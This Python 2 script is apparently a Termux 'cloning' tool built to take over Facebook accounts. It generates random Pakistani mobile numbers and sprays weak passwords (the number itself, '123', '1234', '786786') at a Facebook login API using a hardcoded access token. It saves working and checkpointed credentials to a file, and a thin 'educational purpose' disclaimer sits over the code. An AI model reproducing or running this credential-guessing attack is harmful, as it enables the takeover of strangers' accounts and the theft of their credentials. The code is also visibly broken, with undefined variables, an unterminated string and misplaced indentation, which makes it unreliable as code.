#!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To Somi
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Reserved2020

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 Redmafia2,')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]

def keluar():
	print 'Thanks.'
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(00000.1)
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
print  """
██████╗     ██╗  ██╗
██╔══██╗    ██║ ██╔╝
██████╔╝    █████╔╝ 
██╔══██╗    ██╔═██╗ 
██║  ██║    ██║  ██╗
╚═╝  ╚═╝    ╚═╝  ╚═╝
"""
####Logo####

logo1 = """
██████╗     ██╗  ██╗
██╔══██╗    ██║ ██╔╝
██████╔╝    █████╔╝ 
██╔══██╗    ██╔═██╗ 
██║  ██║    ██║  ██╗
╚═╝  ╚═╝    ╚═╝  ╚═╝


╒══════════════════RK══════════════════╕
\033[1;97m
    NAM KISI OR KA KAM MA DALNA K SHOK 
    YA TRI ZINDAGI KHREED K BHONK
 \033[1;91m   DONT'COPY
 \033[1;94mDEV•••RK
 \033[1;95m WHATAAP••••03188214452
╘══════════════════brand══════════════════╛


"""
logo2 = """
\033[1;97m
                           _(\_/) 

                         ,((((^`\

                        ((((  (6 \ 

                      ,((((( ,    \

  ,,,_              ,(((((  /"._  ,`,

 ((((\\ ,...       ,((((   /    `-.-'

 )))  ;'    `"'"'""((((   (      

(((  /            (((      \

 )) |                      |

((  |        .       '     |

))  \     _ '      `t   ,.')
                               \033[1;97mOnly R....K BRAND
(   |   y;- -,-""'"-.\   \/  

)   / ./  ) /         `\  \

   |./   ( (           / /'

   ||     \\          //'|

   ||      \\       _//'||

   ||       ))     |_/  ||

   \_\     |_/          ||

   `'"                  \_\

                        `'" 
██████╗     ██╗  ██╗
██╔══██╗    ██║ ██╔╝
██████╔╝    █████╔╝ 
██╔══██╗    ██╔═██╗ 
██║  ██║    ██║  ██╗
╚═╝  ╚═╝    ╚═╝  ╚═╝
"""
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
berhasil = []
cekpoint = []
oks = []
id = []
cpb = []
listgrup = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
back = 0
threads = []
sucessful = []
checkpoint = []
oks = []
action_failed = []
idfriends = []
idfromfriends = []
member_id = []
email= []
number = []
id = []
em = []
email_from_friends = []
hp = []
hpfromfriends = []
reaction = []
reactiongroup = []
comment = []
group_comment = []
listgroup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
print """
██████╗     ██╗  ██╗
██╔══██╗    ██║ ██╔╝
██████╔╝    █████╔╝ 
██╔══██╗    ██╔═██╗ 
██║  ██║    ██║  ██╗
╚═╝  ╚═╝    ╚═╝  ╚═╝
"'"
jalan("\033[1;93m ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇")
jalan("\033[1;93m▇▇\033[1;91m   WellCome to My new tools     \033[1;93m▇▇")
jalan("\033[1;93m▇▇\033[1;92m              R.K RIAZKHAN STAR BOY      \033[1;93m▇▇")
jalan("\033[1;93m▇▇\033[1;93m⚡𝐏𝐀𝐊𝐈𝐒𝐓𝐀𝐍 𝐢𝐬 𝐏𝐨𝐰𝐞𝐫 𝐨𝐟 𝐖𝐎𝐑𝐋𝐃⚡\033[1;93m▇▇")
jalan("\033[1;93m▇▇\033[1;94m          Don't copy my scrpit........  \033[1;93m▇▇")
jalan("\033[1;93m▇▇\033[1;95m                 Tool Using Tips     \033[1;93m▇▇")
jalan("\033[1;93m▇▇\033[1;96m            Tool Update EveryDay      \033[1;93m▇▇")
jalan("\033[1;93m▇▇\033[1;97m        Termux Data Clear EveryDay    \033[1;93m▇▇")
jalan("\033[1;93m▇▇\033[1;93m         WhatsApp  Num +923188214452 \033[1;93m▇▇")
jalan("\033[1;93m ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇")
print "\033[1;95m----*----*----*----*----*----*----*----*----*----*----*--RK--*----*----*----*----*----*----*----*----*----*----*----*----*----*----*
CorrectUsername = "RK"
CorrectPassword = "RK"

loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;97m\x1b[1;95mDEVOLPER USERNAME\x1b[1;92m▬▬▬▬▬▬►\x1b[1;94m")
    if (username == CorrectUsername):
    	password = raw_input("\033[1;97m \x1b[1;94mDEVOLPER PASSWORD \x1b[1;93m▬▬▬▬▬▬►\x1b[1;95m")
        if (password == CorrectPassword):
            print "Logged in successfully as " + username #Dev:SOMI
	    time.sleep(2)
            loop = 'false'
        else:
            print "\033[1;94mWrong Password"
            os.system('xdg-open https://wa.me/+923188214452')
    else:
        print "\033[1;94mWrong Username"
        os.system('xdg-open https://wa.me/+923188214452')



##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    os.system('clear')
    print logo1
    print "\033[1;95mÂ«-----------------\033[1;91mDisclaimer\033[1;95m----------------»"
    time.sleep(0.05)
    print "\033[1;42m       \033[1;34mThis Tool is for Educational Purpose   \033[1;0m"
    time.sleep(0.05)
    print "\033[1;43m\033[1;34mThis presentation is for educational          \033[1;0m"
    time.sleep(0.05)
    print "\033[1;44m\033[1;34mpurposes ONLY.How you use this information    \033[1;0m"
    time.sleep(0.05)
    print "\033[1;45m\033[1;34mis your responsibility.I will not be          \033[1;0m"
    time.sleep(0.05)
    print "\033[1;46m\033[1;34mheld accountable This Tool/Channel Doesn't    \033[1;0m"
    time.sleep(0.05)
    print "\033[1;41m\033[1;34mSupport illegal activities.for any illegal    \033[1;0m"
    time.sleep(0.05)
    print "\033[1;43m\033[1;34mActivitie This Tool is for Educational Purpose\033[1;0m"
    time.sleep(0.05)
    print "\033[1;92m-«-----------------\033[1;91mR.K BRAND BOY\033[1;95m----------------»"
    print "\033[1;95m«-----------------\033[1;91mR.KGangster\033[1;95m---------------»"
        time.sleep(0.05)
        print "\033[1;93m■□\033[1;91m> \033[1;91m1.\x1b[1;92m Fast Cloning With out Fb ID\033[1;93m[New Update]"
        time.sleep(0.05)
        print "\033[1;93m■□\033[1;91m> \033[1;93m2.\x1b[1;94m R.K STARWhatsApp Group   "
        time.sleep(0.05)
        print "\033[1;33m■□\033[1;91m> \033[1;96m3.\x1b[1;93m R.K STAR "
        time.sleep(0.05)
	print "\033[1;93m■□\033[1;91m> \033[1;m0.\033[1;95m Exit             "
	pilih_login()
	def pilih_login():
    peak = raw_input("\n\033[1;95mCHOOSE: \033[1;93m")
    if peak =="":
        print "\x1b[1;97mFill In Correctly"
        pilih_login()
    elif peak =="1":
        Zeek()
def Zeek():
    os.system('clear')
    print logo2
    print"\033[1;94m[1]\x1b[1;93mPakistan"
    time.sleep(0.05)
    print '\033[1;94m[0]\x1b[1;95mback'
    time.sleep(0.05)
    time.sleep(0.05)
    action()

def action():
    peak = raw_input('\n\033[1;97mCHOOSE:\033[1;93m')
    if peak =='':
        print '[!] Fill In Correctly'
        action()
    elif peak =="1":              
        os.system("clear")
        print logo2
        print "Enter any Pakistan Mobile code Number"+'\n'
        print 'Enter any code 1 to 49'
        print 'Activitie This Tool is for Educational Purpose     '
        try:
            c = raw_input("\033[1;97mCHOOSE ANYONE : ")
            k="03"
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")
            blackmafiax()
    elif peak =='0':
        login()
    else:
        print '[!] Fill In Correctly'
        action()
    print 50* '\033[1;94m-'
    xxx = str(len(id))
    
    jalan("\033[1;93m ▇▇▇▇▇▇▇▇▇▇")
    jalan ('\033[1;92m Total ids number: '+xxx)
    jalan ('\033[1;94mCode you choose: '+c)
    jalan ("\033[1;93mWait A While Start Cracking...")
    jalan ("\033[1;95mTo Stop Process Press Ctrl+z")
    jalan("\033[1;93m ▇▇▇▇▇▇▇▇▇▇")
    print 50* '\033[1;47m-'
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;93m(🆗)  ' + k + c + user + '■' + pass1                                       
                okb = open('save/cloned.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;97m(❗) ' + k + c + user + '■' + pass1
                    cps = open('save/cloned.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = k + c + user
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;93m(🆗)  ' + k + c + user +  '■' + pass2
                        okb = open('save/cloned.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;97m(❗) ' + k + c + user + '■' + pass2
                            cps = open('save/cloned.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                        else:
                            pass3="123"
                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;93m(🆗)  ' + k + c + user + '■' + pass3
                                okb = open('save/cloned.txt', 'a')
                                okb.write(k+c+user+pass3+'\n')
                                okb.close()
                                oks.append(c+user+pass3)
                            else:
                                if 'www.facebook.com' in q['error_msg']:
                                    print '\033[1;97m(❗) ' + k + c + user + '■' + pass3 
                                    cps = open('save/cloned.txt', 'a')
                                    cps.write(k+c+user+pass3+'\n')
                                    cps.close()
                                    cpb.append(c+user+pass3)
                                else:
                                    pass4="1234"
                                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;93m(🆗)  ' + k + c + user + '■' + pass4 
                                        okb = open('save/cloned.txt', 'a')
                                        okb.write(k+c+user+pass4+'\n')
                                        okb.close()
                                        oks.append(c+user+pass4)
                                    else:
                                        if 'www.facebook.com' in q['error_msg']:
                                            print '\033[1;97m(❗) ' + k + c + user + '■' + pass4
                                            cps = open('save/cloned.txt', 'a')
                                            cps.write(k+c+user+pass4+'\n')
                                            cps.close()
                                            cpb.append(c+user+pass4)
                                        else:
                                            pass5="786786"
                                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;93m(🆗)  ' + k + c + user + '■' + pass5
                                                okb = open('save/cloned.txt', 'a')
                                                okb.write(k+c+user+pass5+'\n')
                                                okb.close()
                                                oks.append(c+user+pass5)
                                            else:
                                                if 'www.facebook.com' in q['error_msg']:
                                                    print '\033[1;97m(❗) ' + k + c + user + '■' + pass5 
                                                    cps = open('save/cloned.txt', 'a')
                                                    cps.write(k+c+user+pass5+'\n')
                                                    cps.close()
                                                    cpb.append(c+user+pass5)
                                                                                                                                                                                                                
                                                                                                                                                                                                                
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            


                                                                                                                                                                                                            
                                                                                                                                                                                                                    
                                                                                                                                                                                                            



        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print 50* '\033[1;91m-'
    print 'Process Has Been Completed ...'
    print 'Total Online/Offline : '+str(len(oks))+'/'+str(len(cpb))
    print('Cloned Accounts Has Been Saved : save/cloned.txt')
    jalan("Note : Your Offline account Will Open after 10 to 20 days")
    print ''
    print """
               

"""

    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          
if __name__ == '__main__':
    login()
